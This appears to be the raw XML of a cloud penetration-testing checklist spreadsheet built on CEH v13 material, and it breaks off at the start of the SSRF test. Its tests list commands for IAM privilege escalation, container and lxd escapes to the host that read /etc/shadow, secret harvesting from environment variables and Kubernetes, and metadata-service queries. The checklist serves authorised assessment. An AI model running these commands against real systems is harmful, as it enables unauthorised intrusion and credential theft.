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dullahRiaz\Downloads\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{7BF2B738-268F-4039-915E-7A11D0D866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📋 Dashboard" sheetId="1" r:id="rId1"/>
    <sheet name="Phase 1 - Recon" sheetId="2" r:id="rId2"/>
    <sheet name="Phase 2 - IAM Testing" sheetId="3" r:id="rId3"/>
    <sheet name="Phase 3 - Compute &amp; Network" sheetId="4" r:id="rId4"/>
    <sheet name="Phase 4 - Storage Security" sheetId="5" r:id="rId5"/>
    <sheet name="Phase 5 - Credential Theft" sheetId="6" r:id="rId6"/>
    <sheet name="Phase 6 - Platform Attacks" sheetId="7" r:id="rId7"/>
    <sheet name="Phase 7 - Advanced Identity" sheetId="8" r:id="rId8"/>
    <sheet name="Phase 8 - Serverless" sheetId="9" r:id="rId9"/>
    <sheet name="Phase 9 - Logging &amp; Monitoring" sheetId="10" r:id="rId10"/>
    <sheet name="Phase 10 - Hardening" sheetId="11" r:id="rId11"/>
    <sheet name="Reference" sheetId="12" r:id="rId12"/>
  </sheets>
  <calcPr calcId="0"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="842" uniqueCount="533">
  <si>
    <t>☁  CLOUD SECURITY TESTING CHECKLIST</t>
  </si>
  <si>
    <t>CEH v13 Module 19 — Cloud VAPT Assessment Tracker</t>
  </si>
  <si>
    <t>Based on: CEH v13 Module 19 Cloud Computing | Cloud Security Testing Guide (CSTG) | CIS Benchmarks | OWASP Cloud Security</t>
  </si>
  <si>
    <t>STATUS LEGEND</t>
  </si>
  <si>
    <t>Not Started</t>
  </si>
  <si>
    <t>Test has not been started yet</t>
  </si>
  <si>
    <t>In Progress</t>
  </si>
  <si>
    <t>Test is currently being conducted</t>
  </si>
  <si>
    <t>Pass</t>
  </si>
  <si>
    <t>Test completed — control is in place</t>
  </si>
  <si>
    <t>Fail</t>
  </si>
  <si>
    <t>Test completed — vulnerability found</t>
  </si>
  <si>
    <t>N/A</t>
  </si>
  <si>
    <t>Test is not applicable to this environment</t>
  </si>
  <si>
    <t>Needs Review</t>
  </si>
  <si>
    <t>Finding requires further analysis</t>
  </si>
  <si>
    <t>ASSESSMENT PHASE OVERVIEW</t>
  </si>
  <si>
    <t>Phase</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>Test Count</t>
  </si>
  <si>
    <t>Category</t>
  </si>
  <si>
    <t>Key Tools</t>
  </si>
  <si>
    <t>Risk Level</t>
  </si>
  <si>
    <t>Phase 1</t>
  </si>
  <si>
    <t>Cloud Reconnaissance &amp; External Enumeration</t>
  </si>
  <si>
    <t>5</t>
  </si>
  <si>
    <t>Passive / OSINT</t>
  </si>
  <si>
    <t>TruffleHog, subfinder, S3Scanner</t>
  </si>
  <si>
    <t>🔴 Critical</t>
  </si>
  <si>
    <t>Phase 2</t>
  </si>
  <si>
    <t>Cloud IAM Testing &amp; Privilege Escalation</t>
  </si>
  <si>
    <t>7</t>
  </si>
  <si>
    <t>Authentication / AuthZ</t>
  </si>
  <si>
    <t>AWS CLI, PMapper, Pacu, AzureGraph</t>
  </si>
  <si>
    <t>Phase 3</t>
  </si>
  <si>
    <t>Compute, Container &amp; Network Security</t>
  </si>
  <si>
    <t>Infrastructure</t>
  </si>
  <si>
    <t>kubectl, kube-hunter, docker CLI</t>
  </si>
  <si>
    <t>Phase 4</t>
  </si>
  <si>
    <t>Cloud Storage Security</t>
  </si>
  <si>
    <t>Data Security</t>
  </si>
  <si>
    <t>AWS CLI, gsutil, Prowler</t>
  </si>
  <si>
    <t>Phase 5</t>
  </si>
  <si>
    <t>SSRF &amp; Cloud Credential Theft</t>
  </si>
  <si>
    <t>Exploitation</t>
  </si>
  <si>
    <t>curl, Burp Suite, AWS CLI</t>
  </si>
  <si>
    <t>Phase 6</t>
  </si>
  <si>
    <t>AWS / Azure / GCP Platform Attacks</t>
  </si>
  <si>
    <t>6</t>
  </si>
  <si>
    <t>Platform-Specific</t>
  </si>
  <si>
    <t>Prowler, Azure CLI, gcloud CLI</t>
  </si>
  <si>
    <t>🟠 High</t>
  </si>
  <si>
    <t>Phase 7</t>
  </si>
  <si>
    <t>Advanced Identity Attacks (SAML, MitC, OIDC)</t>
  </si>
  <si>
    <t>3</t>
  </si>
  <si>
    <t>Identity</t>
  </si>
  <si>
    <t>ADFSpoof, Python3, AWS CLI</t>
  </si>
  <si>
    <t>Phase 8</t>
  </si>
  <si>
    <t>Serverless &amp; Lambda Security</t>
  </si>
  <si>
    <t>Application</t>
  </si>
  <si>
    <t>AWS CLI, pip-audit, Trivy</t>
  </si>
  <si>
    <t>Phase 9</t>
  </si>
  <si>
    <t>Logging, Monitoring &amp; Detection</t>
  </si>
  <si>
    <t>4</t>
  </si>
  <si>
    <t>Visibility</t>
  </si>
  <si>
    <t>AWS CLI, Prowler, GuardDuty</t>
  </si>
  <si>
    <t>🟡 Medium</t>
  </si>
  <si>
    <t>Phase 10</t>
  </si>
  <si>
    <t>Compliance, Hardening &amp; Encryption</t>
  </si>
  <si>
    <t>Governance</t>
  </si>
  <si>
    <t>Prowler, ScoutSuite, kube-bench</t>
  </si>
  <si>
    <t>HOW TO USE THIS CHECKLIST</t>
  </si>
  <si>
    <t>1.</t>
  </si>
  <si>
    <t>Navigate to the relevant phase tab (Phase 1 through Phase 10) for the area you are testing.</t>
  </si>
  <si>
    <t>2.</t>
  </si>
  <si>
    <t>Work through each Test ID row. Read the Objective, Tools, and Methodology Summary columns.</t>
  </si>
  <si>
    <t>3.</t>
  </si>
  <si>
    <t>Execute the test steps documented in the Methodology Summary column using the listed tools.</t>
  </si>
  <si>
    <t>4.</t>
  </si>
  <si>
    <t>Update the Status column using the dropdown: Not Started → In Progress → Pass / Fail / N/A.</t>
  </si>
  <si>
    <t>5.</t>
  </si>
  <si>
    <t>Record findings, observations, evidence references, and recommendations in the Notes column.</t>
  </si>
  <si>
    <t>6.</t>
  </si>
  <si>
    <t>For a quick assessment overview, return to this Dashboard tab to review all phases at a glance.</t>
  </si>
  <si>
    <t>7.</t>
  </si>
  <si>
    <t>The Reference tab provides a condensed flat list of all 53 test cases for reporting purposes.</t>
  </si>
  <si>
    <t>Total Test Cases: 53  |  Phases: 10  |  Cloud Platforms: AWS · Azure · GCP · Kubernetes · Docker · Serverless</t>
  </si>
  <si>
    <t>Phase 1: Cloud Reconnaissance &amp; External Enumeration</t>
  </si>
  <si>
    <t>Test ID</t>
  </si>
  <si>
    <t>Test Name</t>
  </si>
  <si>
    <t>Objective</t>
  </si>
  <si>
    <t>Tools</t>
  </si>
  <si>
    <t>Methodology Summary</t>
  </si>
  <si>
    <t>Pass/Fail Criteria</t>
  </si>
  <si>
    <t>Status</t>
  </si>
  <si>
    <t>Notes</t>
  </si>
  <si>
    <t>CSEC-RECON-001</t>
  </si>
  <si>
    <t>Leaked Credential Discovery in Public Repositories</t>
  </si>
  <si>
    <t>Identify AWS Access Keys, Azure connection strings, GCP service account JSON keys, and API tokens accidentally committed to public code repositories.</t>
  </si>
  <si>
    <t>TruffleHog, GitLeaks, GitHub Advanced Search, truffleHog3</t>
  </si>
  <si>
    <t>1. Run: trufflehog github --org=&lt;target-org&gt; --only-verified
2. Run: gitleaks detect --source https://github.com/&lt;org&gt;/&lt;repo&gt; --report-format json
3. Search GitHub manually: org:&lt;target-org&gt; AKIA
4. Check: org:&lt;target-org&gt; filename:.env AWS_SECRET_ACCESS_KEY
5. Search: org:&lt;target-org&gt; "type": "service_account"</t>
  </si>
  <si>
    <t>Pass: No live credentials are found in any public repository. Fail: Any active cloud credential (AWS key, Azure string, GCP JSON) is discovered in a public repository.</t>
  </si>
  <si>
    <t>CSEC-RECON-002</t>
  </si>
  <si>
    <t>Cloud Storage Bucket Enumeration (S3 / Azure Blob / GCS)</t>
  </si>
  <si>
    <t>Discover publicly accessible cloud storage buckets/containers by enumerating target-derived bucket names without authentication.</t>
  </si>
  <si>
    <t>S3Scanner, AWS CLI, gsutil, curl, Azure CLI</t>
  </si>
  <si>
    <t>1. Create wordlist from org name + common suffixes (backup, dev, prod, staging, assets).
2. Run: s3scanner scan --bucket-file buckets.txt --enumerate
3. Run: aws s3 ls s3://&lt;bucket&gt; --no-sign-request
4. Run: curl -s "https://&lt;account&gt;.blob.core.windows.net/&lt;container&gt;?restype=container&amp;comp=list"
5. Run: gsutil ls gs://&lt;bucket-name&gt;</t>
  </si>
  <si>
    <t>Pass: All storage buckets require authentication and return 403 for unauthenticated access. Fail: Any bucket allows unauthenticated listing, reading, or writing of objects.</t>
  </si>
  <si>
    <t>CSEC-RECON-003</t>
  </si>
  <si>
    <t>Cloud Infrastructure Fingerprinting via DNS and HTTP Headers</t>
  </si>
  <si>
    <t>Identify which cloud providers are in use, which regions assets are hosted in, and which services are exposed, using DNS records, HTTP headers, and OSINT.</t>
  </si>
  <si>
    <t>dig, curl, Shodan, Censys, nmap</t>
  </si>
  <si>
    <t>1. Run: dig ANY target.com; dig CNAME app.target.com
2. Run: curl -sI https://target.com | grep -iE "x-amz|x-azure|x-goog|cf-ray|via"
3. Search Shodan: org:"Target Company" port:6443
4. Search Shodan: org:"Target Company" port:2375
5. Identify CSP from DNS CNAME patterns (amazonaws, windows.net, appspot.com)</t>
  </si>
  <si>
    <t>Pass: Cloud provider identity is not readily discoverable from public sources. Fail: Cloud provider, specific services, regions, and management interfaces are identifiable.</t>
  </si>
  <si>
    <t>CSEC-RECON-004</t>
  </si>
  <si>
    <t>Subdomain Enumeration and Subdomain Takeover Testing</t>
  </si>
  <si>
    <t>Enumerate all subdomains, identify cloud-hosted ones, and detect dangling CNAME records pointing to de-provisioned cloud services that can be claimed by an attacker.</t>
  </si>
  <si>
    <t>subfinder, amass, nuclei, dig</t>
  </si>
  <si>
    <t>1. Run: subfinder -d target.com -all -o subdomains.txt
2. Run: amass enum -passive -d target.com -o amass_subs.txt
3. Check CNAMEs: while read s; do dig CNAME $s +short; done &lt; subdomains.txt
4. Run: nuclei -l subdomains.txt -t dns/subdomain-takeover/ -o takeover.txt
5. Test suspect: curl -s https://cdn.target.com | grep -i "NoSuchBucket\|no such app"</t>
  </si>
  <si>
    <t>Pass: All subdomains resolve to active, controlled services with no dangling CNAMEs. Fail: Any subdomain's CNAME points to a cloud resource that can be claimed by an attacker (subdomain takeover).</t>
  </si>
  <si>
    <t>CSEC-RECON-005</t>
  </si>
  <si>
    <t>Certificate Transparency Log Mining for Hidden Cloud Assets</t>
  </si>
  <si>
    <t>Query public CT logs to discover all SSL/TLS certificates ever issued for the target domain, revealing hidden subdomains and internal cloud-hosted services.</t>
  </si>
  <si>
    <t>crt.sh, curl, python3</t>
  </si>
  <si>
    <t>1. Run: curl -s "https://crt.sh/?q=%.target.com&amp;output=json" | python3 -c "import json,sys; [print(c.get('name_value','')) for c in json.load(sys.stdin)]" | sort -u
2. Filter: grep -iE "dev|staging|api|internal|admin|backup|s3|blob"
3. For each hostname: curl -sI https://&lt;hostname&gt; | grep -iE "x-amz|x-azure|x-goog"
4. Identify cloud-hosted internal services for further testing</t>
  </si>
  <si>
    <t>Pass: No unintended internal or cloud service subdomains are discoverable via CT logs. Fail: Internal hostnames, staging environments, or cloud management interfaces are found.</t>
  </si>
  <si>
    <t>Phase 2: Cloud Identity &amp; Access Management (IAM) Testing</t>
  </si>
  <si>
    <t>CSEC-IAM-001</t>
  </si>
  <si>
    <t>AWS IAM Identity and Caller Enumeration</t>
  </si>
  <si>
    <t>Establish the current caller identity, enumerate all IAM users, roles, groups, and attached policies to map the complete IAM landscape of the AWS account.</t>
  </si>
  <si>
    <t>AWS CLI, PMapper, Pacu</t>
  </si>
  <si>
    <t>1. Run: aws sts get-caller-identity
2. Run: aws iam list-users --output table
3. Run: aws iam list-roles --output table
4. Run: aws iam list-groups --output table
5. Run: aws iam list-policies --scope Local --output table
6. Run: aws iam list-attached-user-policies --user-name &lt;username&gt;
7. Run: aws iam list-role-policies --role-name &lt;role-name&gt;</t>
  </si>
  <si>
    <t>Pass: IAM enumeration is restricted — the test account can only enumerate its own permissions. Fail: The test account can enumerate all users, roles, groups, and policies in the account.</t>
  </si>
  <si>
    <t>CSEC-IAM-002</t>
  </si>
  <si>
    <t>AWS IAM Privilege Escalation Path Analysis</t>
  </si>
  <si>
    <t>Use graph-based analysis to identify all privilege escalation paths from lower-privileged principals to administrative access, including complex multi-hop chains.</t>
  </si>
  <si>
    <t>PMapper, Pacu, AWS CLI</t>
  </si>
  <si>
    <t>1. Run: pmapper graph create
2. Run: pmapper query "who can become an admin"
3. Run: pmapper analysis --output-type text
4. Run: pmapper query "preset privesc --principal arn:aws:iam::&lt;acct&gt;:user/&lt;user&gt;"
5. In Pacu: run iam__privesc_scan
6. Check: aws iam simulate-principal-policy --policy-source-arn &lt;arn&gt; --action-names iam:CreateUser</t>
  </si>
  <si>
    <t>Pass: No privilege escalation paths exist. All users are constrained to least-privilege roles with no policy modification permissions. Fail: Any escalation path exists from a lower-privilege identity to administrative access.</t>
  </si>
  <si>
    <t>CSEC-IAM-003</t>
  </si>
  <si>
    <t>AWS IAM Privilege Escalation via Policy Manipulation</t>
  </si>
  <si>
    <t>Attempt all known IAM privilege escalation techniques including creating policy versions, adding inline policies, adding users to privileged groups, and assuming privileged roles.</t>
  </si>
  <si>
    <t>AWS CLI, Pacu</t>
  </si>
  <si>
    <t>1. Test CreatePolicyVersion: aws iam create-policy-version --policy-arn &lt;arn&gt; --policy-document '{"Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}' --set-as-default
2. Test PutUserPolicy: aws iam put-user-policy --user-name &lt;user&gt; --policy-name EscTest --policy-document '{"Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}'
3. Test AddUserToGroup: aws iam add-user-to-group --user-name &lt;user&gt; --group-name Administrators
4. Test AssumeRole: aws sts assume-role --role-arn &lt;admin-role-arn&gt; --role-session-name pentest</t>
  </si>
  <si>
    <t>Pass: All escalation attempts return AccessDenied. IAM boundaries and SCPs prevent policy modification. Fail: Any technique successfully elevates privileges to a higher permission level.</t>
  </si>
  <si>
    <t>CSEC-IAM-004</t>
  </si>
  <si>
    <t>AWS IAM Access Key Age and Rotation Assessment</t>
  </si>
  <si>
    <t>Identify stale, unused, or over-aged access keys that may have been leaked and are still active, presenting a persistent unauthorized access risk.</t>
  </si>
  <si>
    <t>AWS CLI, Prowler</t>
  </si>
  <si>
    <t>1. For each user: aws iam list-access-keys --user-name &lt;username&gt;
2. Check last use: aws iam get-access-key-last-used --access-key-id &lt;KEY-ID&gt;
3. Loop all users: for user in $(aws iam list-users --query 'Users[].UserName' --output text); do aws iam list-access-keys --user-name $user --output table; done
4. Run: prowler aws --checks iam_access_keys_rotated_90_days
5. Run: aws iam generate-credential-report; aws iam get-credential-report</t>
  </si>
  <si>
    <t>Pass: All access keys are less than 90 days old, actively used, and rotated regularly. No user has more than one active key. Fail: Access keys older than 90 days exist, or inactive keys remain active.</t>
  </si>
  <si>
    <t>CSEC-IAM-005</t>
  </si>
  <si>
    <t>Azure AD (Entra ID) User, Group, and Role Enumeration</t>
  </si>
  <si>
    <t>Map the complete Azure AD tenant including all users, groups, service principals, application registrations, and RBAC role assignments to identify over-privileged identities.</t>
  </si>
  <si>
    <t>Azure CLI, AzureGraph, ROADtools, Prowler</t>
  </si>
  <si>
    <t>1. Run: az ad user list --output table
2. Run: az ad group list --output table
3. Run: az ad sp list --output table
4. Run: az role assignment list --all --query "[?roleDefinitionName=='Owner']" --output table
5. Run: python3 AzureGraph.py --get-all-users; python3 AzureGraph.py --get-privileged-roles
6. Run: roadrecon gather; roadrecon gui</t>
  </si>
  <si>
    <t>Pass: IAM enumeration is restricted. Only the test account's own permissions are visible. Fail: All Azure AD users, groups, service principals, and RBAC assignments are fully enumerable.</t>
  </si>
  <si>
    <t>CSEC-IAM-006</t>
  </si>
  <si>
    <t>GCP IAM Policy and Service Account Key Enumeration</t>
  </si>
  <si>
    <t>Enumerate all GCP project IAM bindings, service accounts, and service account keys to identify over-privileged bindings and exposed long-term credentials.</t>
  </si>
  <si>
    <t>gcloud CLI, GCP Scanner</t>
  </si>
  <si>
    <t>1. Run: gcloud projects get-iam-policy &lt;project-id&gt; --format=json
2. Run: gcloud iam service-accounts list --format="table(email,disabled)"
3. Run: gcloud iam service-accounts keys list --iam-account &lt;sa-email&gt;
4. Check for USER_MANAGED keys (high risk)
5. Run: python3 gcp_scanner.py -k /path/to/key.json -o ./results/
6. Look for roles/owner or roles/editor assigned to external accounts</t>
  </si>
  <si>
    <t>Pass: IAM bindings follow least privilege. No external accounts have Owner/Editor roles. No USER_MANAGED service account keys exist. Fail: Overly permissive IAM bindings or USER_MANAGED service account keys are found.</t>
  </si>
  <si>
    <t>CSEC-IAM-007</t>
  </si>
  <si>
    <t>Multi-Factor Authentication Enforcement Assessment</t>
  </si>
  <si>
    <t>Verify that MFA is enforced for all IAM users across all cloud platforms, particularly for privileged accounts, and that root/global admin accounts are protected.</t>
  </si>
  <si>
    <t>AWS CLI, Azure CLI, Prowler, gcloud CLI</t>
  </si>
  <si>
    <t>1. AWS: aws iam generate-credential-report; check mfa_active column
2. AWS: prowler aws --checks iam_root_mfa_enabled iam_user_mfa_enabled_console_access
3. Azure: prowler azure --checks iam_ensure_mfa_is_enabled_for_all_users
4. AWS Root: aws iam get-account-summary --query 'SummaryMap.AccountMFAEnabled'
5. Check SCP exists: aws organizations list-policies --filter SERVICE_CONTROL_POLICY</t>
  </si>
  <si>
    <t>Pass: MFA is enabled for all users with console access. Root account MFA is enabled. SCP enforces MFA requirement. Fail: Any IAM user with console access lacks MFA, especially privileged or root accounts.</t>
  </si>
  <si>
    <t>Phase 3: Cloud Compute, Container &amp; Network Security Testing</t>
  </si>
  <si>
    <t>CSEC-COMPUTE-001</t>
  </si>
  <si>
    <t>EC2 Instance Security Configuration Assessment</t>
  </si>
  <si>
    <t>Identify EC2 instances with dangerous security group rules, unencrypted EBS volumes, public EBS snapshots, and excessive IAM instance profile permissions.</t>
  </si>
  <si>
    <t>1. Run: aws ec2 describe-security-groups | python3 (check 0.0.0.0/0 inbound rules)
2. Run: aws ec2 describe-snapshots --owner-ids self (check for public snapshots)
3. Run: aws ec2 describe-volumes --query "Volumes[?Encrypted==false]" --output table
4. Run: aws ec2 get-ebs-encryption-by-default
5. Run: prowler aws --checks ec2_securitygroup_allow_ingress_from_internet_to_tcp_port_22 ec2_securitygroup_allow_ingress_from_internet_to_tcp_port_3389</t>
  </si>
  <si>
    <t>Pass: No security groups open critical ports to 0.0.0.0/0. All EBS volumes encrypted. No public snapshots. Fail: SSH (22), RDP (3389), or database ports open to internet, or public EBS snapshots exist.</t>
  </si>
  <si>
    <t>CSEC-COMPUTE-002</t>
  </si>
  <si>
    <t>EC2 Metadata Service (IMDS) Version Enforcement</t>
  </si>
  <si>
    <t>Verify that IMDSv2 is enforced on all EC2 instances to prevent SSRF-to-credential-theft attacks via the instance metadata service at 169.254.169.254.</t>
  </si>
  <si>
    <t>AWS CLI, curl, Prowler</t>
  </si>
  <si>
    <t>1. Check instance metadata options: aws ec2 describe-instances --query "Reservations[*].Instances[*].MetadataOptions"
2. Test IMDSv1 access from instance (must return 401 if IMDSv2 enforced): curl -s http://169.254.169.254/latest/meta-data/instance-id
3. Test IMDSv2 token flow: TOKEN=$(curl -s -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
4. Run: prowler aws --checks ec2_instance_imdsv2_enabled
5. Verify HttpTokens=required for all instances</t>
  </si>
  <si>
    <t>Pass: All EC2 instances have HttpTokens=required (IMDSv2 enforced). IMDSv1 requests return 401. Fail: Any instance has HttpTokens=optional allowing IMDSv1, enabling SSRF-to-credential-theft attacks.</t>
  </si>
  <si>
    <t>CSEC-COMPUTE-003</t>
  </si>
  <si>
    <t>Exposed Docker API Exploitation Assessment</t>
  </si>
  <si>
    <t>Identify and test exposed Docker daemon APIs on TCP ports 2375 (unencrypted) and 2376 (TLS), which grant full container host control without authentication.</t>
  </si>
  <si>
    <t>docker CLI, curl, nmap</t>
  </si>
  <si>
    <t>1. Test API: curl -s http://&lt;target-ip&gt;:2375/info | python3 -m json.tool
2. List containers: docker -H tcp://&lt;target-ip&gt;:2375 ps -a
3. Read env vars: docker -H tcp://&lt;target-ip&gt;:2375 exec -i &lt;container&gt; env
4. Escape to host: docker -H tcp://&lt;target-ip&gt;:2375 run -it --privileged -v /:/host ubuntu:latest chroot /host bash
5. Scan with nmap: nmap -p 2375,2376 --script docker-version &lt;target&gt;</t>
  </si>
  <si>
    <t>Pass: Docker daemon is not exposed on TCP. Port 2376 requires valid client certificate. Fail: Unauthenticated Docker API access allows container enumeration, credential extraction, or host escape.</t>
  </si>
  <si>
    <t>CSEC-COMPUTE-004</t>
  </si>
  <si>
    <t>Container Security Configuration Assessment (from Inside)</t>
  </si>
  <si>
    <t>From within a container shell, assess whether container escape is possible via privileged mode, host path mounts, Docker socket exposure, or excessive Linux capabilities.</t>
  </si>
  <si>
    <t>Linux shell commands, docker CLI</t>
  </si>
  <si>
    <t>1. Check root: id; whoami
2. Check privileged: cat /proc/self/status | grep CapEff
3. Check Docker socket: ls -la /var/run/docker.sock
4. If socket exists — escape: docker -H unix:///var/run/docker.sock run -it --privileged -v /:/host ubuntu:latest chroot /host bash
5. Check host mounts: mount | grep -E "proc|sys|dev|host"
6. Check env secrets: env | grep -iE "password|secret|key|token|api"</t>
  </si>
  <si>
    <t>Pass: Container runs as non-root with no Docker socket mount, no privileged flag, and no host filesystem access. Fail: Container escape to host OS is possible via privileged mode, socket mount, or capability abuse.</t>
  </si>
  <si>
    <t>CSEC-COMPUTE-005</t>
  </si>
  <si>
    <t>Kubernetes Cluster Security Assessment</t>
  </si>
  <si>
    <t>Enumerate Kubernetes cluster resources, test RBAC configurations, identify privileged pods, decode secrets, and use kube-hunter for automated vulnerability detection.</t>
  </si>
  <si>
    <t>kubectl, kube-hunter, kube-bench</t>
  </si>
  <si>
    <t>1. Run: kubectl get pods --all-namespaces -o wide
2. Run: kubectl auth can-i --list --all-namespaces
3. Decode secrets: kubectl get secret &lt;name&gt; -o jsonpath='{.data.password}' | base64 --decode
4. Find privileged pods: kubectl get pods -A -o json | python3 (check securityContext.privileged)
5. Run: kube-hunter --remote &lt;k8s-api-ip&gt; --report json
6. Run: kube-bench (CIS Benchmark check)</t>
  </si>
  <si>
    <t>Pass: No privileged pods, all secrets encrypted at rest, RBAC follows least privilege, API server requires authentication. Fail: Privileged pods exist, secrets are base64 only, or API allows anonymous access.</t>
  </si>
  <si>
    <t>CSEC-COMPUTE-006</t>
  </si>
  <si>
    <t>LXD/LXC Group Privilege Escalation Testing</t>
  </si>
  <si>
    <t>Test whether a user's membership in the lxd group can be exploited to mount the host filesystem inside a container and achieve root access on the host OS.</t>
  </si>
  <si>
    <t>lxc, lxd, Alpine image</t>
  </si>
  <si>
    <t>1. Check group: id | grep lxd
2. If in lxd group — import Alpine image: lxc image import lxd.tar.xz rootfs.squashfs --alias alpine-priv-esc
3. Launch privileged container: lxc init alpine-priv-esc privesc -c security.privileged=true
4. Mount host: lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
5. Start and exec: lxc start privesc; lxc exec privesc -- sh
6. Read host: cat /mnt/root/etc/shadow</t>
  </si>
  <si>
    <t>Pass: User is not in lxd group. LXD is not installed or restricted by policy. Fail: lxd group membership allows full host filesystem access and root privilege escalation.</t>
  </si>
  <si>
    <t>CSEC-COMPUTE-007</t>
  </si>
  <si>
    <t>Security Group and Network Segmentation Assessment</t>
  </si>
  <si>
    <t>Identify security groups opening critical ports to the internet, verify VPC Flow Logs are enabled, assess VPC peering for unintended lateral movement paths.</t>
  </si>
  <si>
    <t>AWS CLI, Prowler, nmap</t>
  </si>
  <si>
    <t>1. Find open ports: aws ec2 describe-security-groups | python3 (check 0.0.0.0/0 on critical ports 22,3389,3306,5432,6379,27017,9200)
2. Check flow logs: for vpc in $(aws ec2 describe-vpcs --query 'Vpcs[].VpcId' --output text); do aws ec2 describe-flow-logs --filter Name=resource-id,Values=$vpc; done
3. Check peering: aws ec2 describe-vpc-peering-connections --output table
4. Test exposed services: redis-cli -h &lt;ip&gt; ping; curl -s http://&lt;ip&gt;:9200/_cluster/health
5. Run: prowler aws --checks vpc_flow_logs_enabled</t>
  </si>
  <si>
    <t>Pass: No critical ports open to 0.0.0.0/0. VPC Flow Logs enabled in all VPCs. No database ports internet-facing. Fail: Management ports exposed to internet. Flow logs disabled. Database services directly reachable.</t>
  </si>
  <si>
    <t>Phase 4: Cloud Storage Security Testing</t>
  </si>
  <si>
    <t>CSEC-STOR-001</t>
  </si>
  <si>
    <t>AWS S3 Bucket Public Access Configuration</t>
  </si>
  <si>
    <t>Verify that AWS S3 Block Public Access is enabled at both account and bucket level, and that no bucket policy or ACL grants public read or write access.</t>
  </si>
  <si>
    <t>AWS CLI, Prowler, S3Scanner</t>
  </si>
  <si>
    <t>1. Account level: aws s3control get-public-access-block --account-id &lt;acct-id&gt;
2. Per bucket: for bucket in $(aws s3 ls | awk '{print $3}'); do aws s3api get-public-access-block --bucket $bucket; done
3. Check bucket ACL: aws s3api get-bucket-acl --bucket &lt;bucket&gt; | grep AllUsers
4. Check bucket policy: aws s3api get-bucket-policy --bucket &lt;bucket&gt; | python3 -m json.tool | grep '"Principal": "\*"'
5. Run: prowler aws --checks s3_bucket_public_access</t>
  </si>
  <si>
    <t>Pass: All four Block Public Access settings are true at account and bucket level. No ACL grants allUsers. Fail: Any bucket setting is false, or ACL/policy grants public read/write access.</t>
  </si>
  <si>
    <t>CSEC-STOR-002</t>
  </si>
  <si>
    <t>AWS S3 Encryption at Rest Verification</t>
  </si>
  <si>
    <t>Verify that all S3 buckets have server-side encryption enabled and that sensitive buckets use KMS customer-managed keys.</t>
  </si>
  <si>
    <t>1. Check per bucket: for bucket in $(aws s3 ls | awk '{print $3}'); do echo -n "$bucket: "; aws s3api get-bucket-encryption --bucket $bucket 2&gt;/dev/null || echo "NO ENCRYPTION"; done
2. Check KMS key: aws s3api get-bucket-encryption --bucket &lt;bucket&gt; --query "ServerSideEncryptionConfiguration.Rules[0].ApplyServerSideEncryptionByDefault"
3. Run: prowler aws --checks s3_bucket_default_encryption
4. Check account default: aws s3api get-bucket-encryption --bucket &lt;bucket&gt;</t>
  </si>
  <si>
    <t>Pass: All buckets have SSE-KMS or SSE-S3 enabled. Sensitive buckets use SSE-KMS with CMKs. Fail: Any bucket has no default encryption, meaning data is stored unencrypted at rest.</t>
  </si>
  <si>
    <t>CSEC-STOR-003</t>
  </si>
  <si>
    <t>AWS S3 Access Logging and Audit Trail</t>
  </si>
  <si>
    <t>Verify that S3 access logging is enabled on all production buckets to maintain an audit trail of all data access events for breach detection.</t>
  </si>
  <si>
    <t>1. Check logging: for bucket in $(aws s3 ls | awk '{print $3}'); do echo -n "$bucket: "; aws s3api get-bucket-logging --bucket $bucket; done
2. Run: prowler aws --checks s3_bucket_logging_enabled
3. Check if the log destination bucket is protected: aws s3api get-bucket-policy --bucket &lt;log-bucket&gt;
4. Verify log bucket has versioning: aws s3api get-bucket-versioning --bucket &lt;log-bucket&gt;</t>
  </si>
  <si>
    <t>Pass: Access logging is enabled on all production buckets. Logs are stored in a separate, protected bucket. Fail: Logging is disabled on any production bucket, creating blind spots for data access detection.</t>
  </si>
  <si>
    <t>CSEC-STOR-004</t>
  </si>
  <si>
    <t>Azure Blob Storage Public Access Assessment</t>
  </si>
  <si>
    <t>Identify Azure storage accounts and containers with public blob access enabled, and test whether sensitive data is readable without authentication.</t>
  </si>
  <si>
    <t>Azure CLI, Prowler, curl</t>
  </si>
  <si>
    <t>1. List accounts: az storage account list --query "[*].{Name:name,AllowBlobPublicAccess:allowBlobPublicAccess}" --output table
2. List containers: az storage container list --account-name &lt;name&gt; --account-key &lt;key&gt; --query "[*].{Name:name,PublicAccess:properties.publicAccess}" --output table
3. Test anonymous: curl -s "https://&lt;account&gt;.blob.core.windows.net/&lt;container&gt;?restype=container&amp;comp=list"
4. Run: prowler azure --checks storage_blob_public_access_level_is_disabled</t>
  </si>
  <si>
    <t>Pass: AllowBlobPublicAccess is false on all storage accounts. All containers require authentication. Fail: Any container has public access enabled, allowing unauthenticated data retrieval.</t>
  </si>
  <si>
    <t>CSEC-STOR-005</t>
  </si>
  <si>
    <t>GCS Bucket IAM Policy and Public Access Assessment</t>
  </si>
  <si>
    <t>Check GCS bucket IAM policies for allUsers or allAuthenticatedUsers bindings that allow public or global authenticated access to bucket contents.</t>
  </si>
  <si>
    <t>gsutil, gcloud CLI</t>
  </si>
  <si>
    <t>1. Check IAM: gsutil iam get gs://&lt;bucket-name&gt;
2. Look for allUsers (anyone) or allAuthenticatedUsers (all Google users) in bindings
3. Test anonymous: gsutil ls gs://&lt;bucket-name&gt; (without credentials)
4. Test download: curl -O "https://storage.googleapis.com/&lt;bucket&gt;/&lt;file&gt;"
5. Check uniform access: gcloud storage buckets describe gs://&lt;bucket&gt; --format="json(iamConfiguration)"</t>
  </si>
  <si>
    <t>Pass: No allUsers or allAuthenticatedUsers bindings exist. Anonymous access returns AccessDeniedException. Fail: Bucket is publicly readable or writable by any internet user or Google account globally.</t>
  </si>
  <si>
    <t>Phase 5: SSRF, Metadata Service &amp; Credential Theft Testing</t>
  </si>
  <si>
    <t>CSEC-CRED-001</t>
  </si>
  <si>
    <t>SSRF to EC2 Metadata Service Credential Theft (AWS)</t>
  </si>
  <si>
